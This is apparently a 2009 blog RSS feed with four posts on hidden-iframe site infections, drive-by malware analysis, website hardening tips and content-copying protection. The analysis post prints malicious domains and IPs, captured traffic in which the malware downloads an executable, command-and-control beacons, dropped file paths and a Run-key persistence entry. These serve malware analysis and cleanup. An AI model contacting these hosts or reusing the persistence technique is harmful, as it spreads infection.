<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Şimşek Mert &#187; hacker</title>
	<atom:link href="http://www.simsekmert.com/wp/tag/hacker/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.simsekmert.com/wp</link>
	<description>Kişisel Web Sayfası</description>
	<lastBuildDate>Thu, 13 Jan 2011 09:10:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Solution to IFRAME and JAVA SCRIPT HACK</title>
		<link>http://www.simsekmert.com/wp/2009/04/solution-to-and-java-script-hack/</link>
		<comments>http://www.simsekmert.com/wp/2009/04/solution-to-and-java-script-hack/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 21:59:44 +0000</pubDate>
		<dc:creator>Şimşek Mert</dc:creator>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Web Siteleri]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hidden iframe]]></category>
		<category><![CDATA[infected]]></category>
		<category><![CDATA[javascript]]></category>

		<guid isPermaLink="false">http://www.simsekmert.com/wp/?p=55</guid>
		<description><![CDATA[ How does this hacking takes place:
This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.
ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!

How it&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p><!-- / icon and title --> <!-- message --><span style="color: red;"><strong>How does this hacking takes place:</strong></span></p>
<p style="text-align: justify;">This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.</p>
<p style="text-align: justify;"><span style="color: red;"><strong>ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!</strong></span><br />
<span id="more-55"></span><br />
<strong>How it&#8217;s done</strong></p>
<p>This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden <span class="highlight">iframe</span> to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.</p>
<p>After they put the <span class="highlight">iframe</span> code into that person&#8217;s pages, anyone visiting that site will be redirected to the hackers infection site, where the person&#8217;s computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands&#8230; Please don&#8217;t think you can depend solely on your antivirus software to <span class="highlight">protect</span> your computer. It more than likely won&#8217;t help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don&#8217;t depend on it completely!</p>
<p>This way this <span class="highlight">hack</span> is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the <span class="highlight">hack</span> on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.</p>
<p><span style="color: red;">===============================================<br />
<strong>Solution:</strong><br />
===============================================</span></p>
<p><strong>For Server Administrators:</strong></p>
<p>If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this <span class="highlight">HACK</span> WILL STOP</p>
<p><strong>For individual person owning just a domain and not server:</strong></p>
<p>If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop</p>
<p>You must have removed the code many times and it comes again, why ???<br />
As you dont change the FTP password. So change that first.</p>
<p>Just changing password is not complete solution but is the first step.<br />
Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.</p>
<p><span style="color: red;">Just do the two things:</span></p>
<p>1) Change the FTP or root password of server<br />
2) Clean format the PC</p>
<p>and take care in future, you dont visit any of the virus links made by this <span class="highlight">hack</span>.<br />
Also to keep your password secure I would suggest you to use any password manager software.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simsekmert.com/wp/2009/04/solution-to-and-java-script-hack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Analysis of a website infected with a hidden iframe</title>
		<link>http://www.simsekmert.com/wp/2009/04/analysis-of-a-website-infected-with-a-hidden-iframe/</link>
		<comments>http://www.simsekmert.com/wp/2009/04/analysis-of-a-website-infected-with-a-hidden-iframe/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 21:44:17 +0000</pubDate>
		<dc:creator>Şimşek Mert</dc:creator>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Web Siteleri]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hidden iframe]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[iframe hack]]></category>
		<category><![CDATA[infected]]></category>
		<category><![CDATA[protect]]></category>
		<category><![CDATA[safe]]></category>

		<guid isPermaLink="false">http://www.simsekmert.com/wp/?p=48</guid>
		<description><![CDATA[An user submitted to us a suspicious link that was present in his website as an hidden iframe.
Malicious hidden iframes are mainly inserted in html pages of legit websites by bad hackers that want to spread their malware with the objective to infect all the users that will visit the compromised website and in most [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">An user submitted to us a suspicious link that was present in his website as an hidden iframe.</p>
<p style="text-align: justify;">Malicious hidden iframes are mainly inserted in html pages of legit websites by bad hackers that want to spread their malware with the objective to infect all the users that will visit the compromised website and in most of the cases, is possible that the hackers have infected the entire files of the website or they have installed a malicious url redirect to other websites with installed other exploits for common used web browsers.</p>
<p><span id="more-48"></span>The website could be compromised by the bad hacker because:<br />
1) You website contains scripts that are vulnerable to RFI/SQL/XSS/LFI/RCE/etc.<br />
2) Your website is hosted in a shared-host and if an hacker has compromise one website hosted in the same cluster where is hosted your website then the hacker can infect ALL the websites present (your included).</p>
<p>Now lets see what would be happened if you had visited the infected website with the hidden malicious iframe.</p>
<p>The malicious hidden iframe looks like:</p>
<p><img style="border: 1px solid #cccccc; margin-left: 5px;" src="http://www.novirusthanks.org/blog/img_articles/hidden-iframe-in-legit-website.gif" alt="" /></p>
<p>After I browsed the malicious url I was redirected to another website that contains a PDF Exploit:</p>
<p><img style="border: 1px solid #cccccc; margin-left: 5px;" src="http://www.novirusthanks.org/blog/img_articles/hidden-iframe-in-legit-website2.gif" alt="" /></p>
<p>Traffic:</p>
<blockquote><p>GET /in.cgi?cocacola46 HTTP/1.1<br />
Host: litetopfindworld.cn<br />
HTTP/1.1 302 Found</p>
<p>GET /index.php?cocacola46 HTTP/1.1<br />
Host: ghrgt.hostindianet.com<br />
HTTP/1.1 200 OK<br />
Server: nginx/0.6.35<br />
Content-Length: 6147</p></blockquote>
<p>Below there is the exploit screenshot:</p>
<p><img style="border: 1px solid #cccccc; margin-left: 5px;" src="http://www.novirusthanks.org/blog/img_articles/hidden-iframe-in-legit-website3.gif" alt="" /></p>
<p>We can see that the exploit redirected my browser to:</p>
<blockquote><p>cache/readme.pdf  =&gt; Another iframe redirect<br />
cache/flash.swf     =&gt; Another iframe redirect</p></blockquote>
<p>Were created various files in Temporary Internet Files related to the malicious urls:</p>
<p><img style="border: 1px solid #cccccc; margin-left: 5px;" src="http://www.novirusthanks.org/blog/img_articles/hidden-iframe-in-legit-website4.gif" alt="" /></p>
<p>After the execution of the files downloaded from the exploit, new files were created in my system:</p>
<blockquote><p>C:\WINDOWS\system32\wbem\grpconv.exe<br />
C:\WINDOWS\Temp\wpv331238107706.exe<br />
C:\WINDOWS\Temp\wpv761238313566.exe<br />
C:\WINDOWS\system32\crypts.dll<br />
C:\Documents and Settings\user\user.exe</p></blockquote>
<p>The file C:\Documents and Settings\user\user.exe had +H (Hidden) attribute and was hidden from explorer search.</p>
<p>The DLL file named <strong>crypts.dll</strong> was injected in explorer.exe and the file named user.exe created a new registry key to be able to startup everytime windows start:</p>
<blockquote><p>HKCU\…\Run\user.exe</p></blockquote>
<p>During the analysis, the malware established various connections with different domains and IPs:</p>
<blockquote><p>94.247.3.152 (hs.3-152.zlkon.lv)<br />
213.155.4.82 (N/A)<br />
78.109.30.224 (reverse30-224.reserver.ru)<br />
94.247.2.95 (hs.2-95.zlkon.lv)<br />
68.180.151.74 (hansali4.com)<br />
83.133.127.5 (.)</p></blockquote>
<p>Traffic:</p>
<blockquote><p>GET /new/controller.php?action=bot&amp;entity_list=&amp;uid=1&amp;first=1&amp;guid=xxx&amp;rnd=xxx HTTP/1.1<br />
Host: 213.155.4.82</p>
<p>POST /good/receiver/online HTTP/1.1<br />
Host: 78.109.30.224<br />
Content-Length: 16<br />
guid=xxxxxx</p>
<p>GET /bt.php?mod=&amp;id=xxx&amp;up=xxx&amp;mid=soboc42 HTTP/1.1<br />
Host: af9f330a59.com<br />
0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;</p>
<p>GET /731l2.exe HTTP/1.1<br />
Host: hansali4.com</p>
<p>POST /gate/gate.php HTTP/1.0<br />
Host: mixmediadirect.cn</p>
<p>194.8.74.51:443 =&gt; SSL Traffic</p></blockquote>
<p>At the end, the malware started to establish connections with hotmail.com probably for spam messages to other emails or something similar:</p>
<blockquote><p>GET / HTTP/1.1<br />
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*<br />
Accept-Language: en-us<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)<br />
Host: hotmail.com<br />
Connection: Keep-Alive</p>
<p>HTTP/1.1 302 Redirected<br />
Date: Sun, 29 Mar 2009 16:59:07 GMT<br />
Server: Microsoft-IIS/6.0<br />
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login</p></blockquote>
<p>Report from the virus scanner:</p>
<blockquote><p>Report Generated: 	29.3.2009 at 19.57.41 (GMT 1)<br />
Time for scan:	50 seconds<br />
File Name:	<strong>index[1].htm</strong><br />
File Size:	6 KB<br />
MD5 Hash:	2F9467513FAE3071B8EC831857963340<br />
SHA1 Hash:	59C6D7D70F529762FAD7408360E016D6C816EFB3<br />
Detection Rate:	<span style="color: red;">2</span> on 24 (8,33 %)<br />
Status:	<span style="color: red;">INFECTED</span><br />
Antivirus 	Sig version 	Engine Version 	Result<br />
a-squared	29/03/2009	4.0.0.32	-<br />
Avira AntiVir	7.1.2.228	8.1.2.12	-<br />
Avast	090328-0	4.8.1229	-<br />
AVG	270.11.31/2028	8.0.0.0	-<br />
BitDefender	29/03/2009	7.0.0.2555	-<br />
ClamAV	29/03/2009	0.93.1.0	-<br />
Comodo	1087	3.8 	-<br />
Dr.Web	29/03/2009	5.0	-<br />
Ewido	29/03/2009	4.0.0.2	-<br />
F-PROT 6	20090328	4.4.4.56	<span style="color: red;">JS/Psyme.IX</span><br />
G DATA	19.3655	2.0.7309.847	-<br />
IkarusT3	27/03/2009 	1001044 	-<br />
Kaspersky	29/03/2009	8.0.0.357	<span style="color: red;">Trojan-Downloader.JS.Agent.duy</span><br />
McAfee	29/03/2009	5.1.0.0	-<br />
Malware Hash Registry	29/03/2009 	N/A 	-<br />
NOD32 v3	3972	3.0.677	-<br />
Norman	2009/03/27	5.92.08	-<br />
Panda	07/02/2009	9.5.1.00	-<br />
QuickHeal	28 March, 2009	10.0	-<br />
Solo Antivirus	29/03/2009	8.0	-<br />
Sophos	29/03/2009	4.32.0	-<br />
TrendMicro	927(592700)	1.1-1001	-<br />
VBA32	29/03/2009	3.12.0.300	-<br />
VirusBuster	10.102.26	1.4.3	-</p></blockquote>
<blockquote><p>Report Generated: 	29.3.2009 at 19.56.42 (GMT 1)<br />
Time for scan:	46 seconds<br />
File Name:	<strong>731l2[1].exe</strong><br />
File Size:	71 KB<br />
MD5 Hash:	6E14662D9469DFC1E6387F9C5D00513A<br />
SHA1 Hash:	C0E8B584E105ACED2A4CE403EF77CB45B3987E45<br />
Detection Rate:	<span style="color: red;">17</span> on 24 (70,83 %)<br />
Status:	<span style="color: red;">INFECTED</span><br />
Antivirus 	Sig version 	Engine Version 	Result<br />
a-squared	29/03/2009	4.0.0.32	-<br />
Avira AntiVir	7.1.2.228	8.1.2.12	<span style="color: red;">TR/Downloader.Gen</span><br />
Avast	090328-0	4.8.1229	<span style="color: red;">Win32:Trojan-gen {Other}</span><br />
AVG	270.11.31/2028	8.0.0.0	<span style="color: red;">Downloader.Generic8.ZVT</span><br />
BitDefender	29/03/2009	7.0.0.2555	<span style="color: red;">Trojan.Generic.1545891</span><br />
ClamAV	29/03/2009	0.93.1.0	-<br />
Comodo	1087	3.8 	<span style="color: red;">Backdoor.Win32.KeyStart.~A</span><br />
Dr.Web	29/03/2009	5.0	<span style="color: red;">Trojan.DownLoader.origin</span><br />
Ewido	29/03/2009	4.0.0.2	-<br />
F-PROT 6	20090328	4.4.4.56	-<br />
G DATA	19.3655	2.0.7309.847	-<br />
IkarusT3	27/03/2009 	1001044 	<span style="color: red;">Backdoor.Win32.KeyStart</span><br />
Kaspersky	29/03/2009	8.0.0.357	<span style="color: red;">Backdoor.Win32.KeyStart.cb</span><br />
McAfee	29/03/2009	5.1.0.0	Generic <span style="color: red;">Downloader.x trojan</span><br />
Malware Hash Registry	29/03/2009 	N/A 	<span style="color: red;">detect rate 74%</span><br />
NOD32 v3	3972	3.0.677	<span style="color: red;">Win32/TrojanDownloader.Agent.OWB</span><br />
Norman	2009/03/27	5.92.08	<span style="color: red;">Trojan W32/DLoader.KZPW</span><br />
Panda	07/02/2009	9.5.1.00	-<br />
QuickHeal	28 March, 2009	10.0	<span style="color: red;">Backdoor.KeyStart.cb</span><br />
Solo Antivirus	29/03/2009	8.0	<span style="color: red;">Backdoor.Win32.KeyStart.CB</span><br />
Sophos	29/03/2009	4.32.0	<span style="color: red;">Sus/Spy-B</span><br />
TrendMicro	927(592700)	1.1-1001	-<br />
VBA32	29/03/2009	3.12.0.300	<span style="color: red;">Backdoor.Win32.KeyStart.bz</span><br />
VirusBuster	10.102.26	1.4.3	<span style="color: red;">Backdoor.KeyStart.AD</span></p></blockquote>
<p style="margin-top: 20px;"><strong>What to do to remove the infection ?</strong></p>
<p><em><span style="color: #8c290b;">Step 1: Clean the html pages</span></em></p>
<p>The first action that the system administrator needs to do is to remove from the HTML pages the malicious hidden iframe code and then check the logs and the code of installed php scripts to find the presence of possible vulnerable code.</p>
<p><em><span style="color: #8c290b;">Step 2: Remove the infected files</span></em></p>
<p>To remove the infected files from your system you need to:</p>
<p>1) Delete all created files, in my case:</p>
<blockquote><p>C:\WINDOWS\system32\wbem\grpconv.exe<br />
C:\WINDOWS\Temp\wpv331238107706.exe<br />
C:\WINDOWS\Temp\wpv761238313566.exe<br />
C:\WINDOWS\system32\crypts.dll<br />
C:\Documents and Settings\user\user.exe</p></blockquote>
<p>2) Delete the malicious registry key, in my case:</p>
<blockquote><p>HKCU\…\Run\user.exe</p></blockquote>
<p>3) Do a complete system scan with your Antivirus to detect other possible viruses installed in your computer.</p>
<p>4) Download, install and update <a href="http://www.novirusthanks.org/progs/3/">NVT Malware Remover Tool</a> and do a complete system scan of your computer.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simsekmert.com/wp/2009/04/analysis-of-a-website-infected-with-a-hidden-iframe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Best Tips to Protect your Web Sites</title>
		<link>http://www.simsekmert.com/wp/2009/04/best-tips-to-protect-your-web-sites/</link>
		<comments>http://www.simsekmert.com/wp/2009/04/best-tips-to-protect-your-web-sites/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 21:38:12 +0000</pubDate>
		<dc:creator>Şimşek Mert</dc:creator>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Web Siteleri]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[korumak]]></category>
		<category><![CDATA[protect]]></category>
		<category><![CDATA[safe]]></category>

		<guid isPermaLink="false">http://www.simsekmert.com/wp/?p=42</guid>
		<description><![CDATA[Web is scarier than most people realize, according to research published recently by Google.These Web-based attacks become much more common in recent years as firewalls and better security practices by Microsoft have made it harder for worms and viruses to directly attack computers. Nowadays about 1.3 percent of all Google Search queries list malicious results [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal" style="text-align: justify;"><span><span class="IL_SPAN">Web</span> is scarier than most people realize, according to research published </span>recently by Google.<span class="arttext"><span><span>These Web-based attacks become much more common in recent years as firewalls and better security practices by Microsoft have made it harder for worms and viruses</span> to directly attack computers. </span></span><span>Nowadays about 1.3 percent of all Google Search queries list malicious results somewhere on the first few pages.</span></p>
<p class="MsoNormal" style="text-align: justify;"><span class="arttext"><span><span>Criminals are getting better at this kind of work. They have built very successful automated tools that poke and prod web</span> sites, looking for programming errors and then exploit these flaws to install the drive-by download software. Often this code opens an invisible iFrame page on the victim’s browser that redirects it to a malicious </span></span></p>
<input name="IL_MARKER" type="hidden" />Web server. That server then tries to install code on the victim’s PC. “The bad guys are getting exceptionally good at automating those attacks,”</p>
<p class="MsoNormal"><span id="more-42"></span><strong><span class="arttext">Following are some tips to get rid of this hackers or hijackers activity.</span></strong></p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]-->Keep you password and username safe change it frequently only with strong password check your password with Microsoft</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]--><span>Keep your PC clean from </span></p>
<input name="IL_MARKER" type="hidden" />viruses and spy-wares because there are chances to hijack your PC contents and login cookies etc. Scan your PC for <span class="IL_SPAN"></p>
<input name="IL_MARKER" type="hidden" />viruses</span> now with NOD32 Online Antivirus Scanner</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]--><span> Keep all folders and files permissions proper in your </span></p>
<input name="IL_MARKER" type="hidden" />web hosting accounts/server.<span> </span>Never give full permission for the folders and files, that means read write and execute permission. If you are hosting sites in Linux platform never give 777 permission (read write and execute permission) to all members even for net users of file and folders. The preferred maximum permission is 755. This means write permission for root user and only read and execute permission for others.</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in;"><!--[if !supportLists]--></p>
<p class="MsoNormal" style="margin-left: 0.25in;"><!--[if !supportLists]--></p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in;"><!--[if !supportLists]--></p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]-->There are many techniques used to hack/hijack the website</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">Cross Site Scripting (XSS)</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">SQL injection flaws</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">Site reconnaissance</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">Session hijacking</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">Application denial of service</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px;">Cookie/session tampering</p>
<p class="MsoNormal" style="margin-left: 0.25in; padding-left: 30px; text-align: justify;"><span>To withstand from this you need “professionally well designed websites” and also powerful </span></p>
<input name="IL_MARKER" type="hidden" />web sitefirewall at server end.</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]--><span>You need to choose good </span></p>
<input name="IL_MARKER" type="hidden" />web<span> hosting platform or company which provides good <span class="IL_SPAN"></p>
<input name="IL_MARKER" type="hidden" />firewalls</span> and Security. If you are going for Linux platform better to choose </span>Grsecurity enabled kernel Servers; especially for shared hosting.</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]--><span>But not the least the best way to find the flow in website is by checking the </span></p>
<input name="IL_MARKER" type="hidden" />web site stats all the day. By this you can find the links/URL which are not related to your website so that you can delete it before it spreads through search engines.</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"><!--[if !supportLists]--><span>-<span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"> </span></span><!--[endif]-->If some one reports your site having virus then its 99% sure your site home pages are having masked IFrames at the beginning or last lines of the page, which actually downloads virus file form some other server/site. You can fix it your self by editing your home page and removing the contents which looks like as shown bellow.</p>
<p class="MsoNormal" style="margin-left: 0.5in; text-indent: -0.25in; text-align: center;"><img style="vertical-align: middle;" title="Best Tips to Protect your Web Sites from Hackers and Malicious contents" src="http://www.jithonline.com/wp-img/Iframe.jpg" alt="Iframe Best Tips to Protect your Web Sites from Hackers and Malicious contents" width="475" height="100" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simsekmert.com/wp/2009/04/best-tips-to-protect-your-web-sites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Protect Your Web Site (Web Sitenizi Koruyun)</title>
		<link>http://www.simsekmert.com/wp/2009/04/protect-your-web-site-web-sitenizi-koruyun/</link>
		<comments>http://www.simsekmert.com/wp/2009/04/protect-your-web-site-web-sitenizi-koruyun/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 21:28:10 +0000</pubDate>
		<dc:creator>Şimşek Mert</dc:creator>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Web Siteleri]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[korumak]]></category>
		<category><![CDATA[protect]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://www.simsekmert.com/wp/?p=39</guid>
		<description><![CDATA[A determined thief will find ways to steal your stuff. They will disable Javascript, search their browser caches, perform screen captures, and use hacking tools to get what they want. Nothing in this article is guaranteed to work 100% of the time. However, a combination of techniques will slow down the determined thieves, stop the [...]]]></description>
			<content:encoded><![CDATA[<p>A determined thief will find ways to steal your stuff. They will disable Javascript, search their browser caches, perform screen captures, and use hacking tools to get what they want. Nothing in this article is guaranteed to work 100% of the time. However, a combination of techniques will slow down the determined thieves, stop the less-intelligent thieves, and possibly remind them that they are stealing your intellectual property.</p>
<p><span id="more-39"></span><br />
The Google Quality Guidelines for Webmasters clearly states &#8220;Don&#8217;t create multiple pages, subdomains, or domains with substantially duplicate content.&#8221; Search engine rankings can fall because your content has been duplicated, either by someone stealing your content, or you having duplicate web sites. If your web site has exclusive content, then other sites can only link to your web site. External links pointing to a single web site with exclusive content will have a higher search engine ranking than the same number of links pointing to many sites with stolen or duplicated web content. Some SEOs believe Google penalizes Page Rank when it finds duplicate content. The Duplicate Content Penalty can mean the removal of your web site from the search engine index (delisting), and lower the overall rank of your web pages. If stolen web content is indexed first, the site with the original web content can be penalized with a lower ranking, or omitted from the search results. Obviously, this can affect revenue for business sites.<br />
Copyright Notice:</p>
<p>In many countries, including the US, UK, and EU, your web site and web content is protected without an official copyright notice. However, other nations require the official copyright notice. Some nations also require the notice &#8220;All Rights Reserved.&#8221; Including the official complete copyright notice with the optional &#8220;All Rights Reserved&#8221; notice on all web pages offers limited protection in countries that accepted the international copyright treaties.</p>
<p>* Display the universally accepted copyright symbol © © with the date and your name on your html pages.© 2007 www.wiscocomputing.com<br />
* Use the copyright metatag on your html pages.<br />
* Comments can be added to your code with your copyright message. &lt;!&#8211; Copyright 2007 WISCO Computing &#8211;&gt;</p>
<p>Copyright Registration:</p>
<p>In the UK, http://www.copyrightservice.co.uk keeps an independent record of your copyrighted material.</p>
<p>In the United States, if you are serious about protecting your hard work you&#8217;ll need to register your web site copyright with the U.S. Copyright Office. Complete information for copyrighting your web site is available at http://www.copyright.gov/circs/circ66.pdf.</p>
<p>Your web site is a published literary work. Your application must contain two deposits of your web site. You have a choice to include representative web pages or paper copies of every page of your web site. You can also include the entire web site on a cd-rom or other electronic format. Obviously, if you include every page of your web site, you have the best proof that plagiarism occurred. If you only registered a representative sample, it will be much harder to prove plagiarism occurred.</p>
<p>You can not file a lawsuit for copyright infringement unless you first obtain a Certificate of Registration or a denial of Registration from the Copyright Office. The copyright will become effective the date the deposit and application is received by the Copyright Office, not the date they complete processing your application (could be months after the received date).</p>
<p>If your copyright is registered before an infringement occurs, you can recover attorneys&#8217; fees and statutory damages. With the ability to claim statuatory damages, you do not have to prove lost profits or the infringer&#8217;s profits because the court can award up to $30,000 for each infringed copyrighted work. Statutory damages of up to $150,000 plus attorney fees can be awarded if the infringement was willful.</p>
<p>If your web site or literary work was not registered before the infringement occurred, you can not obtain statutory damages or attorneys&#8217; fees. You still have the right to obtain an injunction, damages for your lost profits, and the infringer&#8217;s profits.</p>
<p>Obtaining a Certificate of Registration for your web site will allow you to recover statutory damages and attorneys&#8217; fees if future infringements occur. You can obtain a certified copy of your deposit from the Copyright office if it is needed for litigation. Most of the time, your deposit copy, with your Certificate of Registration issued by the Copyright Office is sufficient for litigation.</p>
<p>Protecting Your Pages:</p>
<p>Check to make sure the permissions on your site folders are set correctly. Occasionally check your log files for any attempted hacks.<br />
robots.txt File:</p>
<p>Well-behaved spiders should follow the instructions in your robots.txt file. Banning specific web robots from your web site can reduce your website bandwidth. Log files can be used to identify the different robots that visit your site. If a robot is doing something on your web site that you do not like, or is from a country that you prefer not to index your site, you can ban those robots. Information about known bots is available at http://www.jafsoft.com/searchengines/webbots.html and http://www.robotstxt.org/wc/active.html. If some content does get into a spidered index by accident, you can request that it be removed.<br />
.htaccess file:</p>
<p>Some countries have deserved reputations for fraud and content theft. Your software may have absolutely no sales potential in some countries. It makes no sense to waste your bandwidth, and make it easier for visitors from those countries to steal your content. You may also want to ban visitors that are referred from rogue web sites that list cracks and serial numbers.</p>
<p>Web servers follow your instructions placed in .htaccess files. .htaccess files can be placed in any directory on your web site. The .htaccess file can be used to password protect folders, ban specific web robots, ban visitors with specific IP addresses and countries, allow users with specific IP addresses, stop directory listings, ban specific download software, and redirect visitors to other web pages and web sites.</p>
<p>An .htaccess file placed in your image directory can prevent images from being displayed on a different site. This is called hot linking, and uses your bandwidth. A text line can be included to display an alternate image not located in the protected image directory. Or you could replace your stolen web content with a different image indicating the theft.<br />
HTML Meta Tags:</p>
<p>The following example placed in the  portion of an HTML web page instructs all web robots to not index or analyze the web page for links:<br />
. Not all robots understand this HTML tag.</p>
<p>This code placed in the  portion of an HTML web page stops well-behaved web bots from archiving your content:</p>
<p>Images larger than 200 by 200 display an image toolbar allowing the visitor to save the image (IE 6 and greater). Add this code to the  section of your page to disable the image toolbar (.htaccess can also be used). The image could still be stolen by using screen-capture software.</p>
<p>For all images use:</p>
<p>For individual images use: &lt;img src=&#8221;mypicture.jpg&#8221; alt=&#8221;" /&gt;<br />
Use Absolute Links for HTML Pages:</p>
<p>An absolute link is the complete URL, for example http://www.yourdomain.com/folder/page.htm. If you use relative links, it is very easy for a plagiarist to copy your web site or individual web pages to a new domain. Absolute links would require the plagiarist to work harder to remove or change all of your absolute links. Remember, a plagiarist is lazy. If the plagiarist fails to change or remove all of your links, your web stats could alert you to your stolen web content.</p>
<p>Using absolute links does require more work on your part, but there is another benefit. Sometimes search engines index your site using yourdomain.com instead of www.yourdomain.com, resulting in fewer internal links. A loss of internal links will likely cause your search engine ranking to drop. Since external site links always use www.yourdomain.com, it makes sense to also use absolute internal links to keep your total link count high.<br />
Naming Files and Folders:</p>
